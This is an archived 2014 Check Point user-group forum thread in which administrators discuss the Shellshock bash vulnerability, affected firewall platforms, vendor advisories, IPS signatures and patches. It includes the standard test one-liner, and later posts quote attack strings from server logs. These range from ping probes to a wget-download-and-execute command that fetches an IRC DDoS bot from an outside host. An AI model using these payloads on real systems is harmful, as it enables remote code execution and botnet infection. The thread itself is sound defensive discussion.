CPUG: The Check Point User Group

Resources for the Check Point Community, by the Check Point Community.


Tim Hall has done it yet again - That's right, the 3rd edition is here!
You can read his announcement post here.
It's a massive upgrade focusing on current versions, and well worth checking out. -E

 

Results 1 to 20 of 20

Thread: Bash Vulnerability

  1. #1
    Join Date
    2006-01-25
    Location
    Americas
    Posts
    1,535
    Rep Power
    15

    Default Bash Vulnerability

    https://access.redhat.com/articles/1200223

    Affects Gaia R77.20:

    # env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
    vulnerable
    this is a test
    Last edited by melipla; 2014-09-24 at 13:29.
    Its all in the documentation.

  2. #2
    Join Date
    2006-01-25
    Location
    Americas
    Posts
    1,535
    Rep Power
    15

    Default Re: Bash Vulnerability

    Looks like Check Point is tracking this in sk102673.
    Its all in the documentation.

  3. #3
    Join Date
    2007-10-31
    Location
    Great Plains - USA
    Posts
    159
    Rep Power
    13

    Default Re: Bash Vulnerability

    SK102673 lists Gaia and SecurePlatform OS. My testing shows IPSO 6.2-GA083a02 also vulnerable.

  4. #4
    Join Date
    2014-01-12
    Posts
    30
    Rep Power
    0

    Default Re: Bash Vulnerability

    So we can see that our bash is vulnerable in that it will keep parsing commands after the function definition has ended, but is there a real attack vector from the outside? That is, putting aside examples where someone already has credentials and is escalating privilege.

    For example, do we meet any conditions in the links below, or in Petkovís blog, such that a stranger could pass the malicious environment variable?

    https://securityblog.redhat.com/2014...ection-attack/

    https://community.rapid7.com/communi...-cve-2014-6271

    Iím not familiar enough with the back end and it would be good to be able to tell customers whether we implement anything that provides an attack vector, until the protection is released.

  5. #5
    Join Date
    2005-08-29
    Location
    Upstate NY
    Posts
    2,720
    Rep Power
    17

    Default Re: Bash Vulnerability

    There has been an IPS update to catch this.

  6. #6
    Join Date
    2006-03-19
    Location
    Northern Ohio
    Posts
    1,386
    Rep Power
    15

    Default Re: Bash Vulnerability

    This could get ugly fairly fast.

    https://www.trustedsec.com/september...proof-concept/ - I wonder how many home routers have a bash shell in their innards.

    I've already seen exploit code that looks like it could run rm -rf / if Apache is running as root.

    There just seem to be a ton of vectors.

  7. #7
    Join Date
    2007-06-04
    Posts
    3,314
    Rep Power
    17

    Default Re: Bash Vulnerability

    Whilst there is an IPS protection released for this, is there going to be a patch made available for the actual platforms themselves. Also there are still a number of people that don't buy the IPS subscriptions, which an IPS update won't help for.

  8. #8
    Join Date
    2006-04-27
    Location
    Twillight zone
    Posts
    1,009
    Rep Power
    15

    Default Re: Bash Vulnerability

    Quote Originally Posted by mcnallym View Post
    Whilst there is an IPS protection released for this, is there going to be a patch made available for the actual platforms themselves. Also there are still a number of people that don't buy the IPS subscriptions, which an IPS update won't help for.
    There are new bash versions available
    https://supportcenter.checkpoint.com...ionid=sk102673

  9. #9
    Join Date
    2007-10-31
    Location
    Great Plains - USA
    Posts
    159
    Rep Power
    13

    Default Re: Bash Vulnerability

    I have 2 independent SMS's, along with 10 gateways licensed for IPS. After sk102673 was updated on Thursday stating a IPS signature had been released (http://www.checkpoint.com/defense/ad...-25-sep-2.html) I downloaded updates to one of my SMS's. No protection for GNU BASH is listed in the update. This morning I updated my 2nd SMS, again no IPS sig for BASH. My update version is 634146421 on both SMS's.

    Has anyone else experienced trouble getting this signature?

    Edit to add.... My SMS's are R77.1 and gateways are combination of R77.1 and R75.47
    Last edited by dbrown3611; 2014-09-26 at 12:16. Reason: version info

  10. #10
    Join Date
    2012-08-16
    Posts
    182
    Rep Power
    8

    Default Re: Bash Vulnerability

    No issue here. Running R77.20 Update revision 634146421. Protection GNU Bash Remote Code Execution

  11. #11
    Join Date
    2011-08-02
    Location
    http://spikefishsolutions.com
    Posts
    1,657
    Rep Power
    10

    Default Re: Bash Vulnerability

    so i know the webui is a vector for this issue, but does anyone know if legacy client auth is?

  12. #12
    Join Date
    2011-08-02
    Location
    http://spikefishsolutions.com
    Posts
    1,657
    Rep Power
    10

    Default Re: Bash Vulnerability

    Quote Originally Posted by jflemingeds View Post
    so i know the webui is a vector for this issue, but does anyone know if legacy client auth is?
    I thought i replied to this, but i guess i didn't submit. Support said legacy client auth is not affected.

  13. #13
    Join Date
    2005-11-25
    Location
    United States, Southeast
    Posts
    857
    Rep Power
    15

    Default Re: Bash Vulnerability

    Has anyone noticed any hits on the Bash IPS Protection? Any logs from that Protection at all?

  14. #14
    Join Date
    2006-03-19
    Location
    Northern Ohio
    Posts
    1,386
    Rep Power
    15

    Default Re: Bash Vulnerability

    Just some false positives outbound. We added an exclusion for the proxy as source.

  15. #15
    Join Date
    2011-05-06
    Location
    UK
    Posts
    14
    Rep Power
    0

    Default Re: Bash Vulnerability

    A bit of clarification.
    Any system that has bash on it is vulnerable ie IPSO , SPLAT etc R version is not really relevant in this respect.
    If you run tests on R70-R65 IPSO 4.2 it still comes up vulnerable .
    The solutions covered in sk ,work just on the listed versions for now , although list is growing fast .
    Untill Sunday situation was further confused by mismatch reference , where the header said "All" systems and platforms and disclaymer at the very last line of the text listed a number of tested versions for which solution was ready.
    I missed this orginally and me and my collegues spent a merry 40 minutes trying to figure out why it didn t work on R70 IPSO 6.2.

  16. #16
    Join Date
    2006-01-25
    Location
    Americas
    Posts
    1,535
    Rep Power
    15

    Default Re: Bash Vulnerability

    According to this article, bash is still vulnerable. Expect more patching to be done.
    Its all in the documentation.

  17. #17
    Join Date
    2012-08-16
    Posts
    182
    Rep Power
    8

    Default Re: Bash Vulnerability

    I've got a few hits.

    http://() { :; }; ping -c 3 188.165.227.201/
    http://() { :; }; /bin/ping -c 3 5.61.38.5/

    Looks like there just waiting for ping backs to attempt something further.

  18. #18
    Join Date
    2005-08-14
    Location
    Gig Harbor, WA, USA
    Posts
    2,494
    Rep Power
    17

    Default Re: Bash Vulnerability

    WebUIs are only potentially vulnerable if a bash script is used for a CGI script.
    Legacy Client Auth should not use bash, thus not vulnerable.

    Check Point is continuing to update sk102673 as appropriate with updated information and fixes for this issue, including for some officially "out of support" versions.
    http://phoneboy.org
    Unless otherwise noted, views expressed are my own

  19. #19
    Join Date
    2007-06-27
    Posts
    22
    Rep Power
    0

    Default Re: Bash Vulnerability

    Hi

    I read this article today and it presents a slightly different approach with regard to this new bug.
    It is strongly recommended to read and learn.

    http://www.sentrix.com/being-exploit...k-is-needless/

    Full disclosure, I am employed at CHECK POINT and I have no interest in SENTRIX,
    the information is shared due to the interest to the public of security persons.

    Regards,
    Guy

  20. #20
    Join Date
    2014-01-12
    Posts
    30
    Rep Power
    0

    Default Re: Bash Vulnerability

    I have some interesting hits on my box so far.

    Code:
    nginx-access.log:209.126.230.72 - - [25/Sep/2014:01:41:36 -0500] "GET / HTTP/1.0" 444 0 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
    (A security guy doing a scan.)

    Code:
    nginx-access.log:89.207.135.125 - - [25/Sep/2014:05:12:49 -0500] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 444 0 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
    (No motives announced. This was reported to the abuse contact of the address block for the originating address. They replied that the server was found to have been compromised and was reinstalled.)

    Code:
    nginx-access.log:54.251.83.67 - - [26/Sep/2014:23:54:37 -0500] "GET / HTTP/1.1" 444 0 "-" "() { :;}; /bin/bash -c \x22echo testing9123123\x22; /bin/uname -a"
    (Not sure what this is supposed to accomplish.)


    Attempts to get an IRC bot with DDoS and other functions:

    Code:
    nginx-access.log:63.131.141.125 - - [27/Sep/2014:03:39:57 -0500] "GET / HTTP/1.0" 444 0 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
    nginx-access.log:63.131.141.125 - - [27/Sep/2014:03:39:57 -0500] "GET /cgi-bin/test.sh HTTP/1.0" 444 0 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
    nginx-access.log:63.131.141.125 - - [27/Sep/2014:03:39:57 -0500] "GET /test HTTP/1.0" 444 0 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
    Just pings (possibly DDoSing, or counting vulnerable machines?)

    Code:
    nginx-access.log:176.31.248.153 - - [27/Sep/2014:18:40:03 -0500] "GET / HTTP/1.0" 444 0 "-" "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0Cookie: () { :; }; /usr/bin/env ping -c 3 46.105.77.107Host: () { :; }; /usr/bin/env ping -c 3 46.105.77.107Referer: () { :; }; /usr/bin/env ping -c 3 46.105.77.107Cookie: /usr/bin/env X='() { (a)=>' bash -c 'echo /usr/bin/env ping -c 3 46.105.77.107'; cat echoHost: /usr/bin/env X='() { (a)=>' bash -c 'echo /usr/bin/env ping -c 3 46.105.77.107'; cat echoReferer: /usr/bin/env X='() { (a)=>' bash -c 'echo /usr/bin/env ping -c 3 46.105.77.107'; cat echoAccept: */*"
    nginx-access.log:188.165.227.201 - - [29/Sep/2014:09:11:43 -0500] "GET / HTTP/1.0" 444 0 "() { :; }; ping -c 3 188.165.227.201" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3"
    nginx-access.log:188.165.227.201 - - [29/Sep/2014:13:05:53 -0500] "GET / HTTP/1.0" 444 0 "() { :; }; /bin/ping -c 3 188.165.227.201" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3"
    nginx-access.log:188.165.227.201 - - [29/Sep/2014:15:21:41 -0500] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 444 0 "() { :; }; /bin/ping -c 3 188.165.227.201" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3"
    nginx-access.log:188.165.227.201 - - [29/Sep/2014:16:45:26 -0500] "GET /cgi-bin/redirect.cgi HTTP/1.0" 444 0 "() { :; }; /bin/ping -c 3 188.165.227.201" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3"
    nginx-access.log:188.165.227.201 - - [29/Sep/2014:17:51:47 -0500] "GET /cgi-bin/redirect.cgi HTTP/1.0" 444 0 "() { :; }; /bin/ping -c 3 188.165.227.201" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3"
    nginx-access.log:46.161.41.142 - - [29/Sep/2014:18:43:59 -0500] "GET / HTTP/1.0" 444 0 "() { :; }; ping -c 46.161.41.142" "() { :; }; ping -c 46.161.41.142"
    Also counting?

    Code:
    nginx-access.log:82.221.105.197 - - [30/Sep/2014:02:45:17 -0500] "GET / HTTP/1.1" 444 0 "-" "() { :;}; /bin/bash -c \x22wget http://82.221.105.197/bash-count.txt\x22"

Similar Threads

  1. CPINFO Error : bash: cpinfo: command not found
    By PTVenom in forum cpinfo/InfoView
    Replies: 5
    Last Post: 2011-09-25, 02:47
  2. SecurePlatform bash prompt
    By alienbaby in forum Scripts and Tools
    Replies: 3
    Last Post: 2011-05-26, 12:48
  3. Vulnerability in 3.8.6
    By belvdr in forum About This Discussion Board
    Replies: 1
    Last Post: 2010-07-27, 11:42
  4. IE Vulnerability
    By mdelongchamp in forum Miscellaneous
    Replies: 0
    Last Post: 2008-12-17, 12:28
  5. Vulnerability
    By yogi_ccse in forum Miscellaneous
    Replies: 0
    Last Post: 2006-11-17, 13:31

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •